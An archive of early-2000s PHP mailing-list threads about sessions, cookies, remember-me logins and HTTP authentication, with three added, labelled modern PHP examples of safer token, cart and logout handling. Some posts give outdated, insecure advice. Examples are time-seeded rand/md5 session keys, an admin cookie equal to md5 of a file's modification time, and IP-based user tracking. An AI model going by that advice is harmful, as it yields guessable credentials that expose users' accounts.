 
  Chad
 
  -Original Message-
  From: Chad Day [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, July 16, 2002 12:30 PM
  To: [EMAIL PROTECTED]
  Subject: [PHP] Sessions / logins / cookies / security
 
 
  I asked something similar a little while ago, but didn't do a good job
  clarifying.
 
  What I'm looking to do is when a user logs in, I start up the session..
  I then have the registered session var to verify they are authenticated
  as they move throughout the site.
 
  Now, when they close the browser and come back, I want them to still be
  authenticated.  Obviously, I have to set a cookie.  But what do I set?
  Do I set just their user ID?  The MD5 of their password?  What's the
  most secure way, that's not easily spoofed?  I don't know that much
  about cookies, but if I just use a user ID, couldn't someone just change
  that ID value and 'become' another user?
 
  Thanks for any advice,
  Chad



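Chad Day's question above (what to put in a persistent cookie so that the value cannot simply be edited into another user's id) and John Holmes's advice to use a random identifier that is not derived from user data, worked through as an added example. This is not code from the thread or from any of the posters; it assumes a PDO connection `$db` and a table `remember_tokens(selector, validator_hash, user_id, expires)`, both hypothetical, and it uses `random_bytes()` and the array form of `setcookie()`, which need PHP 7.0 and 7.3 respectively and did not exist when the thread was written. The cookie carries a random token, the token is stored hashed so a leaked table does not yield usable cookies, and the session id is regenerated once the user is identified.

```php
<?php
// Added example, not from the thread: a "remember me" cookie that carries a
// random token instead of the user id or a password hash.
// Assumed (hypothetical): a PDO handle $db and a table
// remember_tokens(selector, validator_hash, user_id, expires).

declare(strict_types=1);

const REMEMBER_COOKIE = 'remember';
const REMEMBER_TTL    = 30 * 24 * 3600; // 30 days

// Called once after a successful password login.
function issue_remember_cookie(PDO $db, int $userId): void
{
    $selector  = bin2hex(random_bytes(9));   // lookup key, not secret
    $validator = bin2hex(random_bytes(32));  // secret half; only its hash is stored
    $expires   = time() + REMEMBER_TTL;

    $stmt = $db->prepare(
        'INSERT INTO remember_tokens (selector, validator_hash, user_id, expires) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([$selector, hash('sha256', $validator), $userId, $expires]);

    setcookie(REMEMBER_COOKIE, $selector . ':' . $validator, [
        'expires'  => $expires,
        'path'     => '/',
        'secure'   => true,    // only sent over HTTPS, so it cannot be sniffed in transit
        'httponly' => true,    // not readable by page script, which blunts XSS theft
        'samesite' => 'Lax',
    ]);
}

// Returns the user id if the cookie is valid, null otherwise.
function check_remember_cookie(PDO $db): ?int
{
    $raw = $_COOKIE[REMEMBER_COOKIE] ?? '';
    if ($raw === '' || substr_count($raw, ':') !== 1) {
        return null;
    }
    [$selector, $validator] = explode(':', $raw, 2);

    $stmt = $db->prepare('SELECT validator_hash, user_id, expires FROM remember_tokens WHERE selector = ?');
    $stmt->execute([$selector]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || (int) $row['expires'] < time()) {
        return null;
    }

    // Constant-time comparison of the presented secret against the stored hash.
    if (!hash_equals($row['validator_hash'], hash('sha256', $validator))) {
        // Right selector, wrong secret: treat the token as compromised and revoke it.
        $db->prepare('DELETE FROM remember_tokens WHERE selector = ?')->execute([$selector]);
        return null;
    }
    return (int) $row['user_id'];
}

// Resume a login from the cookie when no session is active.
function resume_session(PDO $db): ?int
{
    session_start();
    if (isset($_SESSION['user_id'])) {
        return (int) $_SESSION['user_id'];
    }
    $userId = check_remember_cookie($db);
    if ($userId !== null) {
        session_regenerate_id(true);   // fresh session id once the user is identified
        $_SESSION['user_id'] = $userId;
    }
    return $userId;
}
```

Nothing in the cookie is derived from the user record, so changing the value to "become" another user means guessing 32 random bytes; the selector/validator split lets the lookup use an index without exposing the secret to a timing side channel. The thread's `uniqid()`+`md5()` construction is not a random-number generator, so this example uses `random_bytes()` in its place.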




RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-15 Thread Garth Dahlstrom

 maintain state accross requests.  This is done in 3 different ways.

 1. Cookies
 2. URL Mangling
 3. HTTP Authentication

#4 Passing a SID/Session info in hidden fields, but it means 
you must push every page move through a submit (which can be 
done with Javascript, image buttons, etc), depending on what you 
are trying to do it might be alright...

-GED







[PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Matthew Walker

We have a shopping cart product we're developing in PHP, and I've
recently come across a dilemma that I need to find a reliable solution
to.

Many of the people who will be shopping on our sites have cookies
disabled, which presents a problem when using sessions. Now, I am aware
of the fact that we could append the SID constant to every URL, but this
will not work for us. None of our sites are dynamic, and updating them
is out of the question (We have over 100 sites). As well, someday we
intend to sell this software, and we don't want to require that people
make their sites fully dynamic to accommodate it.

So, is there any reliable way to emulate sessions without requiring a
cookie, or a variable passed in every URL?

Matthew Walker
Senior Software Engineer
ePliant Marketing
 


---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002
 





Re: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Rasmus Lerdorf

Use standard HTTP authentication over SSL - that's the only other way.





Re: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Miguel Cruz

On Tue, 14 May 2002, Matthew Walker wrote:
 Many of the people who will be shopping on our sites have cookies
 disabled, which presents a problem when using sessions. Now, I am aware
 of the fact that we could append the SID constant to every URL, but this
 will not work for us. None of our sites are dynamic, and updating them
 is out of the question (We have over 100 sites). As well, someday we
 intend to sell this software, and we don't want to require that people
 make their sites fully dynamic to accommodate it.

I don't entirely understand. If your site is not dynamic, then what do you 
need sessions for?

miguel






RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Matthew Walker

The sites are not dynamic, but the shopping cart /is/. The problem is,
if people don't have cookies on, when they return to the site to order
more products, they lose the SID that has been appended to the links
inside the cart, and thus lose the contents of their shopping cart.

Matthew Walker
Senior Software Engineer
ePliant Marketing
 





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Matthew Walker

You're not understanding the problem. This is not an authentication
situation. We are using sessions to track information about what a
customer's OrderID is, and other related information.

Matthew Walker
Senior Software Engineer
ePliant Marketing
 





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Rasmus Lerdorf

I am understanding the problem perfectly.  HTTP is stateless.  You want to
maintain state across requests.  This is done in 3 different ways.

1. Cookies
2. URL Mangling
3. HTTP Authentication

You said you did not want to do 1 or 2.  That only leaves you with HTTP
Authentication.  HTTP Authentication is really just like a cookie that
can't be disabled when it comes down to it.

-Rasmus





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Miguel Cruz

On Tue, 14 May 2002, Matthew Walker wrote:
 The sites are not dynamic, but the shopping cart /is/. The problem is,
 if people don't have cookies on, when they return to the site to order
 more products, they lose the SID that has been appended to the links
 inside the cart, and thus lose the contents of their shopping cart.

I think you are running into facts of life here. You can only keep track
of people using a limited set of mechanisms (which Rasmus has listed).

Perhaps with cunning design you could use frames and JavaScript to handle 
this but it's outside the scope of PHP.

miguel






RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Martin Towell

You're missing one method - using the user's IP address
It's not a guaranteed fool-proof method, but if you don't want to use
cookies or the URL, then this sorta works.





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Matthew Walker

Could you explain how this could be accomplished, because I'm not
understanding how to do it.

As I understand HTTP Authentication (correct me if I'm wrong), the
user's computer still has to send a 'username/password' pair to perform
the authentication. I can't see how this could be used to maintain
session data.

But maybe my mind is just trapped in a rut. Please enlighten me.

Matthew Walker
Senior Software Engineer
ePliant Marketing
 





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Rasmus Lerdorf

No, it doesn't work at all.  All sorts of people are behind proxies.
Every AOL user, for example.  All these people end up showing up as the
same, or at least one of a pool of a few dozen IPs.  If you use this
method millions of users will end up sharing the same shopping cart.
That's probably not a good idea.

-Rasmus

On Wed, 15 May 2002, Martin Towell wrote:

 You're missing one method - using the user's IP address
 It's not a guaranteed fool-proof method, but if you don't want to use
 cookies or the URL, then this sorta works.




RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Rasmus Lerdorf

 Could you explain how this could be accomplished, because I'm not
 understanding how to do it.

 As I understand HTTP Authentication (correct me if I'm wrong), the
 user's computer still has to send a 'username/password' pair to perform
 the authentication. I can't see how this could be used to maintain
 session data.

 But maybe my mind is just trapped in a rut. Please enlighten me.

The problem here is not where to store the session data.  That's obvious.
You store the session data on your server.  The real problem is linking
the session data (ie. the contents of a shopping cart) to a specific user
so when that same user is surfing through your site, on every request you
know which cart is his.  And if he goes away and comes back later, you
again can go find his cart and you know what is in it.

Ergo, therefore, if you are able to uniquely identify the user you have
solved your session problem.  HTTP Authentication does this brilliantly.
The only difference between cookies and http auth is that with a cookie
you send the remote user a unique identifier that is then sent back to you
whenever that specific user visits your site.  Because this happens
automatically and people don't like that, some people turn this off.
With HTTP authentication, instead of doing this automatically you have the
user create a profile on your site where part of this will include a
unique identifier and a password.  Each time the user visits your site
this information will be sent exactly like a cookie.  Depending on how
users configure their browsers they may have to log in at the beginning of
a session although these days most browsers have these password managers
that make this login procedure trivial.

-Rasmus


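Rasmus's point above, that HTTP Authentication gives the server a per-user identifier on every request just as a cookie does, so the shopper's cart can be keyed on it, as an added example. This is not code from the thread or from PHP's documentation; it assumes a PDO handle `$db` over a SQLite file and two tables, `shoppers(username, password_hash)` and `carts(username, items)`, all hypothetical, and uses `password_verify()` (PHP 5.5+) and the `ON CONFLICT` upsert syntax of SQLite 3.24+. The cart is looked up by the authenticated username only, never by anything carried in the URL.

```php
<?php
// Added example, not from the thread: a cart page that identifies the
// returning shopper through HTTP Basic authentication instead of a cookie or
// a session id in the URL. Assumed (hypothetical): a PDO handle $db with
// tables shoppers(username, password_hash) and carts(username, items).

declare(strict_types=1);

// Returns the username when the credentials match, null otherwise.
function authenticate(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('SELECT password_hash FROM shoppers WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    // password_verify compares in constant time and understands bcrypt/argon2 hashes.
    if ($hash === false || !password_verify($pass, (string) $hash)) {
        return null;
    }
    return $user;
}

// A 401 makes the browser prompt once; it then re-sends the credentials with
// every request in this realm, which is Rasmus's "cookie that can't be disabled".
function require_basic_auth(PDO $db): string
{
    $user = $_SERVER['PHP_AUTH_USER'] ?? '';
    $pass = $_SERVER['PHP_AUTH_PW'] ?? '';
    $who  = $user !== '' ? authenticate($db, $user, $pass) : null;
    if ($who === null) {
        header('WWW-Authenticate: Basic realm="Shop"');
        http_response_code(401);
        exit('Please sign in to see your cart.');
    }
    return $who;
}

// The cart is keyed by the authenticated username, so one shopper cannot
// reach another's cart by editing a request parameter.
function load_cart(PDO $db, string $user): array
{
    $stmt = $db->prepare('SELECT items FROM carts WHERE username = ?');
    $stmt->execute([$user]);
    $json = $stmt->fetchColumn();
    if ($json === false) {
        return [];
    }
    $items = json_decode((string) $json, true);
    return is_array($items) ? $items : [];
}

function save_cart(PDO $db, string $user, array $items): void
{
    $stmt = $db->prepare(
        'INSERT INTO carts (username, items) VALUES (?, ?) '
        . 'ON CONFLICT(username) DO UPDATE SET items = excluded.items'
    );
    $stmt->execute([$user, json_encode(array_values($items))]);
}

// Basic auth sends the password base64-encoded on every request, so as the
// thread says it only makes sense over SSL/TLS; refuse plain HTTP outright.
if (empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] === 'off') {
    http_response_code(403);
    exit('This cart is only available over HTTPS.');
}

$db   = new PDO('sqlite:' . __DIR__ . '/shop.sqlite');  // assumed store
$user = require_basic_auth($db);
$cart = load_cart($db, $user);
if (isset($_POST['add'])) {
    $cart[] = (string) $_POST['add'];
    save_cart($db, $user, $cart);
}
header('Content-Type: application/json');
echo json_encode(['user' => $user, 'cart' => $cart]);
```

Because the browser caches the credentials for the realm, there is nothing for the shopper to lose when the SID is gone from a static page's links: the next request to the cart arrives with the `Authorization` header again and the same username selects the same cart. The cost, as Matthew noted, is that the shopper has to create an account and sign in once.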




RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Mark Charette

If it ain't foolproof then only a fool would use it ...

IP addresses are just about the worst way to identify anyone.

-Original Message-
From: Martin Towell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 14, 2002 8:17 PM
To: 'Rasmus Lerdorf'; Matthew Walker
Cc: [EMAIL PROTECTED]
Subject: RE: [PHP] Sessions Without Cookies or SID Passing...


You're missing one method - using the user's IP address
It's not a guaranteed fool-proof method, but if you don't want to use
cookies or the URL, then this sorta works.







RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Vail, Warren

Especially if they come through a gateway, or use internet connection
sharing, you can't tell them apart using IP Addresses.


Warren Vail
Tools, Metrics & Quality Processes
(415) 667-7814
Pager (877) 774-9891
215 Fremont 02-658






RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread Matthew Walker

Blah. That's a really ugly choice, but I suppose we may end up having to
do that.

I'd give my kingdom for always-on cookies. Ah well. I'll look into this
some more once my current project is finished. Thanks for your advice.
(And thanks to everyone else too)

Matthew Walker
Senior Software Engineer
ePliant Marketing
 





RE: [PHP] Sessions Without Cookies or SID Passing...

2002-05-14 Thread David Freeman


  You're missing one method - using the user's IP address
  It's not a guaranteed fool-proof method, but if you don't 
  want to use cookies or the URL, then this sorta works.

Unless there's a firewall using NAT or a proxy cache involved.  I know
for a fact that our internal network only ever reports the address of
our firewall.  We run an Internet kiosk of sorts so if two or three
people hit your site from inside our firewall they will all look like
the same person.

We're not alone in doing this sort of thing.

CYA, Dave







[PHP] sessions, PHPSESSID, cookies

2002-01-09 Thread gkin

I have a website where I use sessions. After a user has logged off, the logon
screen appears again. The username field is filled with the value from a
cookie.

What happens:

For example: username = Peter

In the situation that I log off (and the logon page appears), the username
field gets the value from the cookie plus the string "; PHPSESSID" (Peter;
PHPSESSID).

When I close the browser window and open a new browser window the value of
the username is correct (Peter). The string "; PHPSESSID" is not in the
cookie. What is the reason that this string (the variable name for the session
id as set in my php.ini) appears in this field?

In other words, why is the session_id variable name displayed in a field
that is filled by a cookie? I also tried to end the session, but the only
thing I can find is destroy_session and that only destroys everything that
is within that session, but it does not kill the session itself.

How do I solve this problem?

Regards,

Gilbert




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
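Gilbert's second complaint, that destroying the session does not end it, comes from the fact that `session_destroy()` only removes the server-side record: the `$_SESSION` array for the current request and the browser's session cookie have to be cleared separately, or the old id simply arrives again with the next request. A logout that does all three, as an added example that is not code from the thread; it assumes a hypothetical `/login.php` and a separate, non-secret `username` cookie for pre-filling the form, and uses the array form of `setcookie()` and the `samesite` key of `session_get_cookie_params()`, both PHP 7.3+.

```php
<?php
// Added example, not from the thread: a logout that removes the server-side
// session, the in-request copy, and the browser's session cookie.
// Assumed (hypothetical): a login form at /login.php and a separate cookie
// named "username" that only pre-fills the form.

declare(strict_types=1);

function logout(): void
{
    session_start();      // a session must be active before it can be destroyed

    $_SESSION = [];       // drop the copy held for the rest of this request

    // Expire the session cookie with the same parameters it was set with; a
    // cookie cleared under a different path or domain is a different cookie,
    // and the browser would keep sending the original one.
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'] ?: 'Lax',
        ]);
    }

    session_destroy();    // remove the server-side record
}

// The remembered username lives in its own cookie, separate from the session
// id, so the two values never end up concatenated into one field. Anything
// taken from a cookie is untrusted input, so escape it before it goes into HTML.
function prefilled_username(): string
{
    $name = $_COOKIE['username'] ?? '';
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $name)) {
        return '';   // reject values that cannot be a username rather than echoing them
    }
    return htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

logout();
header('Location: /login.php');
exit;
```

On `/login.php` the field would be rendered as `<input name="username" value="<?= prefilled_username() ?>">`; the whitelist check means a cookie that has picked up a stray `; PHPSESSID` fragment, or script, produces an empty field instead of being reflected into the page.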




Re: [PHP] Sessions and Cookies on Macs

2001-08-28 Thread mike cullerton

on 8/27/01 10:31 AM, Richard Baskett at [EMAIL PROTECTED] wrote:

> Ok on a pc when I have cookies turned off I am still able to access my
> session variables, but on a mac I can not.  Is there a difference between
> the way session variables are stored on each platform?  And if a session is
> indeed a cookie, then why does the session still work on pc's with cookies
> disabled?
> 
> Rick
> 

check out http://www.php.net/manual/en/ref.session.php as a place to start.
if cookies are turned off, the session is maintained in the url.

have you figured out your mac session problem? i use a mac to develop my
sites, and many of them use sessions without a problem. when i turn off
cookies in the browser (usually the latest version of ie) php handles it
smoothly.

let me know if you have any questions,
mike


-- mike cullerton







Re: [PHP] Sessions and Cookies on Macs

2001-08-28 Thread Richard Baskett

I just used the url to pass it since no matter what I did I couldn't seem to
get it to work when cookies were turned off on my mac.  I've read the
session url on the php site from top to bottom and the transparent sessions
are even enabled on the server, but yet to no avail on the mac :(

> on 8/27/01 10:31 AM, Richard Baskett at [EMAIL PROTECTED] wrote:
> 
>> Ok on a pc when I have cookies turned off I am still able to access my
>> session variables, but on a mac I can not.  Is there a difference between
>> the way session variables are stored on each platform?  And if a session is
>> indeed a cookie, then why does the session still work on pc's with cookies
>> disabled?
>> 
>> Rick
> 
> check out http://www.php.net/manual/en/ref.session.php as a place to start.
> if cookies are turned off, the session is maintained in the url.
> 
> have you figured out your mac session problem? i use a mac to develop my
> sites, and many of them use sessions without a problem. when i turn off
> cookies in the browser (usually the latest version of ie) php handles it
> smoothly.
> 
> let me know if you have any questions,
> mike
> 
> 
> -- mike cullerton






[PHP] Sessions and Cookies on Macs

2001-08-27 Thread Richard Baskett

Ok on a pc when I have cookies turned off I am still able to access my
session variables, but on a mac I can not.  Is there a difference between
the way session variables are stored on each platform?  And if a session is
indeed a cookie, then why does the session still work on pc's with cookies
disabled?

Rick






RE: [PHP] Sessions vs Cookies?

2001-06-22 Thread Jason Murray

> I am about to write a new admin system for a website I do and 
> it will have many different logins. I was wondering overall which 
> most of you thought would be better for such a thing? What's really 
> a pro about sessions over cookies?

If it's for an admin section, then you may as well use cookies. If
the client doesn't want to use cookies they can't use their admin
interface. :) I doubt they would have privacy issues with themselves
anyway.

If you're going to use cookies, hopefully you'll have a database 
system available (you said you'd have lots of different logins).

So, create a session table:

 ID int
 username text
 password text (if required, maybe you won't need it again)
 logintime int
 expirytime int
 magickey text

Generate a magic key as such:

<?php
   // Seed the generator from the digits of the current time and microtime.
   // (ereg_replace() from the original post was removed in PHP 7; preg_replace()
   // does the same job here.)
   $randomseed = intval(preg_replace("/[^0-9]/", "",
substr(Date("U").microtime(), 4, 10)));
   srand($randomseed);
   $newid = rand(1, 9);

   // Hash the random value, the client's address and the current time.
   // ($REMOTE_ADDR in the original relied on register_globals.)
   $magickey = md5($newid.$_SERVER["REMOTE_ADDR"].time());
?>

This should give you sufficient entropy as to make the magickey unguessable
(except by sheer fluke). Send the magic key as the cookie and log it in the
table (sessiontime = session time in seconds):

  INSERT INTO sessions 
 (username, (password if needed,) logintime, expirytime, magickey)
 VALUES
 ('$uname', ('$pass',) Date(U), Date(U)+$sessiontime, '$magickey')

Every page in the admin area should check the cookie:

  SELECT * FROM sessions WHERE magickey = '$yourcookievalue'
  Ensure that expirytime is not less than date(U)

If those checks fail, redirect them to the login page and Exit().

If the user logs out and you're storing passwords, ensure you delete the 
password with an UPDATE command or else someone breaking into your system
will have just found all your admin passwords. You might want to run a 
script on a crontab to do that as well.

As a slightly more kludgy alternative, take the md5() of the last
modification time of a file somewhere:

<?php
   // Last modification time of a file only the server can see.
   $lastmod = filemtime("/path/to/your/admin/page/index.php");
   $checkvalue = md5($lastmod);
?>

And set $checkvalue as your cookie. Every subsequent page should then
perform the same check and if it fails, redirect as above and Exit().

Hope this helps somewhat.

Jason

-- 
Jason Murray
[EMAIL PROTECTED]
Web Developer, Melbourne IT
What'll Scorpy use wormhole technology for?
'Faster pizza delivery.'
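Jason's session-table scheme written out as an added example (not code from the thread): the magickey comes from random_bytes() instead of the srand()/rand()/md5() seeding above, it is stored hashed, the SQL uses prepared statements rather than interpolated '$uname', and the expiry check and logout deletion are enforced in code. It uses an in-memory SQLite database so it runs on its own; the function names are assumptions.

```php
<?php
// Added example (not from the thread): Jason's "magic key" session table
// with a CSPRNG token, prepared statements, expiry enforcement and row
// deletion on logout. Uses an in-memory SQLite database so it runs
// stand-alone; column names follow the post, function names are assumed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sessions (id INTEGER PRIMARY KEY, username TEXT,
    logintime INTEGER, expirytime INTEGER, magickey TEXT UNIQUE)');

// Create a session row for a user who has already been authenticated.
// random_bytes() replaces the srand()/rand()/md5() seeding from the post;
// the key is stored hashed so a copied table does not yield usable cookies.
function create_session(PDO $db, string $username, int $sessiontime): string {
    $magickey = bin2hex(random_bytes(32));        // 256 bits of entropy
    $now = time();
    $stmt = $db->prepare('INSERT INTO sessions (username, logintime, expirytime, magickey)
                          VALUES (?, ?, ?, ?)');
    $stmt->execute([$username, $now, $now + $sessiontime, hash('sha256', $magickey)]);
    return $magickey;                              // this value goes in the cookie
}

// Every admin page calls this with the cookie value; null means "send to login".
function check_session(PDO $db, string $cookievalue): ?string {
    $stmt = $db->prepare('SELECT username, expirytime FROM sessions WHERE magickey = ?');
    $stmt->execute([hash('sha256', $cookievalue)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || $row['expirytime'] < time()) {
        return null;                               // unknown key or expired
    }
    return $row['username'];
}

// Logout deletes the row, so a cookie captured earlier stops working.
function destroy_session(PDO $db, string $cookievalue): void {
    $stmt = $db->prepare('DELETE FROM sessions WHERE magickey = ?');
    $stmt->execute([hash('sha256', $cookievalue)]);
}

// Walk-through with a constructed login of one hour.
$key = create_session($db, 'alice', 3600);
$ok = check_session($db, $key) === 'alice'
   && check_session($db, 'not-a-real-key') === null;
destroy_session($db, $key);
$ok = $ok && check_session($db, $key) === null;
echo $ok ? "session checks behave as expected\n" : "unexpected result\n";
```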





Re: [PHP] Sessions vs Cookies?

2001-06-22 Thread Christopher Ostmo

Chris Anderson pressed the little lettered thingies in this order...

> I am about to write a new admin system for a website I do and it will have
> many different logins. I was wondering overall which most of you thought
> would be better for such a thing? What's really a pro about sessions over
> cookies?
> 

PHP sessions actually are cookies in most cases, but will revert to 
sending an ID tag in the URL if the user has cookies disabled (the ID 
tag does not need to be programmed into the URL, the PHP engine 
inserts it automatically).

Use sessions. Period.

If you design your own cookie solution, it won't work for people who have 
disabled cookies.  If you design your own ID tag in the URL system, 
you will have A LOT of extra typing to get the ID tag in every URL. If you 
design one that works for both, you've wasted a lot of time.

If you use PHP's sessions, you let PHP do the work for you.

Check out:
http://www.php.net/manual/en/ref.session.php

Christopher Ostmo
a.k.a. [EMAIL PROTECTED]
AppIdeas.com
Meeting cutting edge dynamic
web site needs

For a good time,
http://www.AppIdeas.com/





Re: [PHP] Sessions vs Cookies?

2001-06-22 Thread Michael Hall


As I understand it, PHP's session management uses cookies anyway unless
they are turned off by the browser, in which case session info is attached
to the URL.

So I'd use sessions rather than cookies alone.

Mick

On Thu, 21 Jun 2001, Chris Anderson wrote:

> I am about to write a new admin system for a website I do and it will have many 
> different logins. I was wondering overall which most of you thought would be better 
> for such a thing? What's really a pro about sessions over cookies?
> 






RE: [PHP] Sessions vs Cookies?

2001-06-22 Thread Christopher Ostmo

Jason Murray pressed the little lettered thingies in this order...

>> I am about to write a new admin system for a website I do and 
>> it will have many different logins. I was wondering overall which 
>> most of you thought would be better for such a thing? What's really 
>> a pro about sessions over cookies?
> 
> If it's for an admin section, then you may as well use cookies. If
> the client doesn't want to use cookies they can't use their admin
> interface. :) I doubt they would have privacy issues with themselves
> anyway.
> 
> If you're going to use cookies, hopefully you'll have a database 
> system available (you said you'd have lots of different logins).
> 
> So, create a session table:
> 
>  ID int
>  username text
>  password text (if required, maybe you won't need it again)
>  logintime int
>  expirytime int
>  magickey text
> 
> Generate a magic key as such:
> 
> <?php
>    $randomseed = intval(ereg_replace("[^0-9]", "",
> substr(Date("U").microtime(), 4, 10)));
>    srand($randomseed);
>    $newid = rand(1, 9);
> 
>    $magickey = md5($newid.$REMOTE_ADDR.time());
> ?>
> 

That's really a lot of coding to do when you consider that PHP does this 
(or something very similar) for you when it initializes your user session.

It really would be foolish to attempt to create new session tracking code 
if you use PHP4.

Allow PHP to initialize the session, assign the variable, attempt to set 
the cookie and place the session ID onto the URL tag if it can't read the 
cookie.  All that you have to do as the programmer is insert the session 
ID (which PHP has generated) into a database and possibly match it up 
with a valid login in that database entry.

Doing the session coding yourself is a waste of time. You're not likely to 
find a more reliable session tracking solution than what's built into 
PHP4 as long as HTTP connections remain stateless.

Christopher Ostmo
a.k.a. [EMAIL PROTECTED]
AppIdeas.com
Meeting cutting edge dynamic
web site needs

For a good time,
http://www.AppIdeas.com/





[PHP] Sessions vs Cookies?

2001-06-21 Thread Chris Anderson



I am about to write a new admin system for a 
website I do and it will have many different logins. I was wondering overall 
which most of you thought would be better for such a thing? What's really a pro 
about sessions over cookies?


[PHP] sessions and cookies

2001-03-31 Thread David Hynes

I am using sessions to password protect a section of a website.

I am storing the session ID in a cookie but just in case cookies are not
enabled, I am also passing the session ID in the query string to each page
in the protected directory.

Please can someone tell me if this could cause any problems, especially if
the user if tries to access a URL from their history bar in the browser with
an old session ID.

I think what I'm trying to ask is, if the script receives a session ID from
a query string and a cookie, which does it use?

Thanks,
David.

---
Fed202 Solutions
www.fed202solutions.com
Mobile : 07779 293368
---
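An added example (not code from the thread) for David's question and for Christopher Ostmo's advice above to insert the PHP-generated session ID into the database: PHP consults the cookie first and only falls back to a PHPSESSID in the query string or POST body when no cookie arrives and use_only_cookies is off, so an old ID from the history bar is ignored as long as the cookie is present. The block shows the weak settings beside the hardened ones and rotates the ID at login before binding it to the user row; the function names and the users table are assumptions.

```php
<?php
// Added example (not from the thread): the php.ini settings that decide
// which session ID PHP accepts, weak values beside hardened ones, plus
// binding the PHP-generated session ID to the login row as Christopher
// Ostmo suggests. Function names and the users table are assumptions.

// Weak: PHP reads the ID from the cookie first and, with no cookie, falls
// back to PHPSESSID in the URL or POST body, accepting any ID it is given.
$weak = [
    'session.use_only_cookies' => 0,
    'session.use_trans_sid'    => 1,   // appends PHPSESSID=... to links and forms
    'session.use_strict_mode'  => 0,
];

// Hardened: cookies only, no URL rewriting, reject IDs PHP did not create.
$hardened = [
    'session.use_only_cookies' => 1,
    'session.use_trans_sid'    => 0,
    'session.use_strict_mode'  => 1,
    'session.cookie_httponly'  => 1,   // script cannot read the cookie
    'session.cookie_secure'    => 1,   // only sent over HTTPS
    'session.cookie_samesite'  => 'Strict',
];

function configure_sessions(array $settings): void {
    foreach ($settings as $key => $value) {
        ini_set($key, (string) $value);
    }
    ini_set('session.save_path', sys_get_temp_dir());  // keeps the demo stand-alone
}

// On successful login: rotate the ID so a value fixed before login is
// useless, then record the new ID next to the user.
function bind_login(PDO $db, string $username): string {
    session_regenerate_id(true);        // new ID, old session data deleted
    $_SESSION['username'] = $username;
    $stmt = $db->prepare('UPDATE users SET session_id = ? WHERE username = ?');
    $stmt->execute([session_id(), $username]);
    return session_id();
}

configure_sessions($hardened);
session_start();
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE users (username TEXT PRIMARY KEY, session_id TEXT)");
$db->exec("INSERT INTO users (username) VALUES ('alice')");   // constructed user
$id = bind_login($db, 'alice');
$stored = $db->query("SELECT session_id FROM users WHERE username = 'alice'")->fetchColumn();
echo $stored === $id ? "session bound to alice\n" : "mismatch\n";
```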






Re: [PHP] sessions and cookies

2001-03-31 Thread \[Inf\] F!RE-WALL

I don't recommend putting the Session ID in the URL. Subscribed members could
pass URLs to each other and that way they could have each other's settings.

""David Hynes"" [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
 I am using sessions to password protect a section of a website.

 I am storing the session ID in a cookie but just in case cookies are not
 enabled, I am also passing the session ID in the query string to each page
 in the protected directory.

 Please can someone tell me if this could cause any problems, especially if
 the user if tries to access a URL from their history bar in the browser
with
 an old session ID.

 i think what I'm trying to ask is , if the script receives a session ID
from
 a query string and cookie, which does it use ?

 Thanks,
 David.

 ---
 Fed202 Solutions
 www.fed202solutions.com
 Mobile : 07779 293368
 ---










[PHP] sessions without cookies?

2001-03-27 Thread duirfire

Hi, can someone point me toward a tutorial that shows how to register info
(e.g. username, login status, and user preferences) and do this in a session
without using cookies... is this even possible?

thanks!
duirfire






Re: [PHP] sessions without cookies?

2001-03-27 Thread Yasuo Ohgaki

You can use URL mode for PHP4 session if you want session w/o cookie.

How about read this link?
http://www.zend.com/zend/tut/session.php

--
Yasuo Ohgaki


"duirfire" [EMAIL PROTECTED] wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
 Hi, can someone point me toward a tutorial that shows how to register info
 (e.g. username, login status, and user preferences) and do this in a session
 without using cookies... is this even possible?

 thanks!
 duirfire









[PHP] Sessions, no cookies, enable-trans-sids, no success

2001-03-14 Thread Eric Nielsen

I'm using 4.04pl1 with --enable-trans-sids configured.  I did the make
distclean that some people suggest in the annotated manual.  The relative
URLs in forms and anchor are not getting the session id appended (neither
are the absolutes in header/Location, but I understand that a current
limitation).  What else do I need to do?

Eric Nielsen





